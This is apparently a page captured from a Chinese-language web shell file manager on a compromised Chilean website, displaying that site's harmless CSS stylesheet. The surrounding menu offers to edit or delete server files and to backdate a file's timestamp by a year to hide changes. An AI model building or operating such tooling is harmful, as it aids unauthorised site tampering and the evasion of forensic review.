文件操作 - styles.css
返回文件管理
返回主菜单
删除本文件
文件: /var/www/residenciaremota.cl/html/css/styles.css
编辑文件内容
@charset "utf-8"; /* CSS Document */ /****General****/ html, body { margin:0; padding: 0; font-family: 'Raleway', sans-serif; color:#212121; font-weight: 400; } html { scroll-behavior: smooth; } div { box-sizing: border-box; } button:focus, a:focus, .btn:focus { outline: none; box-shadow: none; } body { background-image: url(../images/bg.jpg); } .wow { visibility: hidden; } .b-300 { font-weight: 300; } .b-400 { font-weight: 400; } .b-600 { font-weight: 700; } .b-italic { font-weight: 600; font-style: italic; } .azul { color: #019fa2; } .bg-azul { background-color: #293a3a; } .btn-azul, .btn-azul:hover { background-color: #019fa2!important; color: #fff; } .btn-azul-osc, .btn-azul-osc:hover { background-color: #307573!important; color: #fff; } .btn-azul-osc2, .btn-azul-osc2:hover { background-color: #293a3a!important; color: #fff; } .btn-rojo, .btn-rojo:hover { background-color: #e12229!important; color: #fff; } .para-wrapper { margin: 0 auto; width: 100%; max-width: 1200px; padding: 10px; position: relative; } .fecha { font-weight: 600; font-size: 1.5rem; margin-right: .5rem; } .ballena { background-image: url(../images/ballena.png); background-repeat: no-repeat; background-size: 50%; background-position: right center; animation: ballenamove 10s ease infinite; } @keyframes ballenamove { 0% {background-position: right center;} 50% {background-position: right bottom;} 100% {background-position: right center;} } .chilco { animation: chilcomove 10s ease infinite; } @keyframes chilcomove { 0% {background-position: left center;} 50% {background-position: left top;} 100% {background-position: left center;} } .btn-floating svg { margin-top: 14px; margin-left: 0px; } .btn-floating.btn-sm svg { margin-top: 10px; margin-left: 0px; } .flotar { animation: float 6s ease-in-out infinite; } .flotar1 { animation-delay: 1s } .flotar2 { animation-delay: 2s } .flotar3 { animation-delay: 3s } @keyframes float { 0% { transform: translatey(0px); } 50% { transform: translatey(-20px); } 100% { transform: translatey(0px); } } .close { position: absolute; top: 10px; right: 10px; z-index: 10; } /***************/ @media (min-width: 1460px) {} @media (min-width: 992px) {} @media (max-width: 991px) {} @media (max-width: 720px) {} @media (max-width: 576px) { .ballena { background-size: 100%; } .chilco { width: 70%; } @keyframes ballenamove { 0% {background-position: right 90%;} 50% {background-position: right bottom;} 100% {background-position: right 90%;} } .btn-crece { display: block; width: 100%; } } /****************/
修改文件时间
将文件时间修改为当前时间的前一年
删除文件